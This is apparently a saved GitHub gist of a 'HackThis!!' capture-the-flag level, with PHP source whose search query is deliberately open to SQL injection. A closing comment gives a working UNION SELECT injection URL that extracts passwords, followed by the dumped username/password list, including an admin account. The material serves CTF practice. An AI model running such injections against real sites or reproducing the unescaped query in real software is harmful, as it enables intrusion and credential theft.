Last active
December 10, 2015 18:08
-
-
Save evandrix/4472509 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE HTML> | |
| <html lang = "en"> | |
| <head> | |
| <title>HackThis!! - Capture the Flag</title> | |
| <meta charset = "UTF-8" /> | |
| <link href='https://fonts.googleapis.com/css?family=Ubuntu|Orbitron' rel='stylesheet' type='text/css'> | |
| <link rel="stylesheet" href="/ctf/css/main.css"> | |
| <script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> | |
| </head> | |
| <body> | |
| <div class='level_title'> | |
| Level 5 </div> | |
| <div class='nav'> | |
| <a href='/ctf/leaderboard'>Leaderboard</a> | <a href='/ctf/irc'>IRC</a> | <a href='/'>Normal Site</a> | <a href='?logout'>Logout</a> | |
| </div> | |
| <div class='level_container'> | |
| <form autocomplete="off" method="POST"> | |
| <input type="text" name="user" data-holder="Username"/><br/> | |
| <input type="password" name="pass" data-holder="Password"/><br/> | |
| <input type="submit" class="submit" value="Login"/> | |
| </form> | |
| <a href='#' class='view'>View Details</a> | |
| </div> | |
| <div class='level_code'> | |
| <a href='#' class='close'>[X]</a> | |
| <div class='code'> | |
| <code><span style="color: #000000"> | |
| <span style="color: #0000BB"><?php<br /> </span><span style="color: #FF8000">// ...<br /><br /> </span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">]) && isset(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">])) {<br /> </span><span style="color: #0000BB">$user </span><span style="color: #007700">= </span><span style="color: #0000BB">sqlite_escape_string</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">]);<br /> </span><span style="color: #0000BB">$pass </span><span style="color: #007700">= </span><span style="color: #0000BB">sqlite_escape_string</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">]);<br /><br /> </span><span style="color: #0000BB">$query </span><span style="color: #007700">= </span><span style="color: #DD0000">"SELECT username, admin FROM members<br /> WHERE username='</span><span style="color: #0000BB">$user</span><span style="color: #DD0000">' AND password='</span><span style="color: #0000BB">$pass</span><span style="color: #DD0000">' LIMIT 1"</span><span style="color: #007700">;<br /><br /> if (</span><span style="color: #0000BB">$result </span><span style="color: #007700">= </span><span style="color: #0000BB">$db</span><span style="color: #007700">-></span><span style="color: #0000BB">query</span><span style="color: #007700">(</span><span style="color: #0000BB">$query</span><span style="color: #007700">)) {<br /> </span><span style="color: #0000BB">$user </span><span style="color: #007700">= </span><span style="color: #0000BB">$db</span><span style="color: #007700">-></span><span style="color: #0000BB">fetch</span><span style="color: #007700">();<br /> if (</span><span style="color: #0000BB">$user</span><span style="color: #007700">) {<br /> </span><span style="color: #FF8000">// ...<br /> </span><span style="color: #007700">} else {<br /> </span><span style="color: #FF8000">// ...<br /> </span><span style="color: #007700">}<br /> }<br /> }<br /><br /> </span><span style="color: #FF8000">// ...<br /><br /> </span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #DD0000">'q'</span><span style="color: #007700">])) {<br /> </span><span style="color: #0000BB">$q </span><span style="color: #007700">= </span><span style="color: #DD0000">'%' </span><span style="color: #007700">. </span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #DD0000">'q'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'%'</span><span style="color: #007700">;<br /><br /> </span><span style="color: #0000BB">$query </span><span style="color: #007700">= </span><span style="color: #DD0000">"SELECT username FROM members<br /> WHERE username LIKE '</span><span style="color: #0000BB">$q</span><span style="color: #DD0000">'"</span><span style="color: #007700">;<br /><br /> if (</span><span style="color: #0000BB">$result </span><span style="color: #007700">= </span><span style="color: #0000BB">$db</span><span style="color: #007700">-></span><span style="color: #0000BB">query</span><span style="color: #007700">(</span><span style="color: #0000BB">$query</span><span style="color: #007700">)) {<br /> while (</span><span style="color: #0000BB">$obj </span><span style="color: #007700">= </span><span style="color: #0000BB">$db</span><span style="color: #007700">-></span><span style="color: #0000BB">fetch</span><span style="color: #007700">()) {<br /> </span><span style="color: #0000BB">printf</span><span style="color: #007700">(</span><span style="color: #DD0000">"%s<br/>"</span><span style="color: #007700">, </span><span style="color: #0000BB">$obj</span><span style="color: #007700">-></span><span style="color: #0000BB">username</span><span style="color: #007700">);<br /> }<br /><br /> </span><span style="color: #0000BB">$result</span><span style="color: #007700">-></span><span style="color: #0000BB">close</span><span style="color: #007700">();<br /> }<br /> }<br /></span><span style="color: #0000BB">?><br /></span> | |
| </span> | |
| </code> </div> | |
| </div> | |
| <script type="text/javascript"> | |
| var _gaq = _gaq || []; | |
| _gaq.push(['_setAccount', 'UA-34026704-2']); | |
| _gaq.push(['_trackPageview']); | |
| (function() { | |
| var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; | |
| ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; | |
| var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); | |
| })(); | |
| </script> | |
| <script src="/ctf/js/main.js"></script> | |
| </body> | |
| </html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // ... | |
| if (isset($_POST['user']) && isset($_POST['pass'])) { | |
| $user = sqlite_escape_string($_POST['user']); | |
| $pass = sqlite_escape_string($_POST['pass']); | |
| $query = "SELECT username, admin FROM members | |
| WHERE username='$user' AND password='$pass' LIMIT 1"; | |
| if ($result = $db->query($query)) { | |
| $user = $db->fetch(); | |
| if ($user) { | |
| // ... | |
| } else { | |
| // ... | |
| } | |
| } | |
| } | |
| // ... | |
| if (isset($_REQUEST['q'])) { | |
| $q = '%' . $_REQUEST['q'] . '%'; | |
| $query = "SELECT username FROM members | |
| WHERE username LIKE '$q'"; | |
| if ($result = $db->query($query)) { | |
| while ($obj = $db->fetch()) { | |
| printf("%s<br/>", $obj->username); | |
| } | |
| $result->close(); | |
| } | |
| } | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
http://www.hackthis.co.uk/ctf/5?q=%' UNION ALL SELECT password FROM members--
walsh / 123456
blunden / cat
AJulie / opawje£Rsd
bew8re / password
overlord / secret <= ADMIN
sheperd / l0ve#
god / qwertyuiop